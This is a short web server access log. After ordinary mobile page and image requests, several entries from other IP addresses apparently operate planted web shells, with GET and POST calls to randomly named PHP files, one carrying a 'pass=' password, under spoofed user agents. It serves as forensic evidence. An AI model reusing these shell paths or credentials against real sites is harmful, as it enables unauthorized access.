112.200.235.175 - - [22/Mar/2021:11:35:07 +0800] "GET /images/side_length.png HTTP/1.1" 302 186 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
112.200.235.175 - - [22/Mar/2021:11:35:07 +0800] "GET /images/prod_dim.png HTTP/1.1" 302 186 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
112.200.235.175 - - [22/Mar/2021:11:35:07 +0800] "GET /images/dental_block.png HTTP/1.1" 302 186 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
112.200.235.175 - - [22/Mar/2021:11:35:08 +0800] "GET / HTTP/1.1" 200 15296 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
112.200.235.175 - - [22/Mar/2021:11:35:08 +0800] "GET / HTTP/1.1" 200 15296 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
112.200.235.175 - - [22/Mar/2021:11:35:09 +0800] "GET / HTTP/1.1" 200 15296 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
45.137.20.69 - - [22/Mar/2021:11:38:02 +0800] "POST /rddfvgtran.php?pass=uphiuxactd HTTP/1.1" 200 5880 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
45.137.20.69 - - [22/Mar/2021:11:38:03 +0800] "GET /rddfvgtran.php?pass=uphiuxactd HTTP/1.0" 200 5880 "-" "-"
37.235.54.104 - - [22/Mar/2021:11:45:11 +0800] "GET /rddfvgtran.php?pass=uphiuxactd HTTP/1.1" 200 5880 "-" "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"
37.235.54.104 - - [22/Mar/2021:11:45:12 +0800] "POST /rddfvgtran.php?pass=uphiuxactd HTTP/1.1" 200 46038 "-" "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"
104.131.163.71 - - [22/Mar/2021:12:01:31 +0800] "GET /zaytvmqyhw.php HTTP/1.1" 200 4956 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.131.163.71 - - [22/Mar/2021:12:01:31 +0800] "POST /zaytvmqyhw.php HTTP/1.1" 200 2408 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
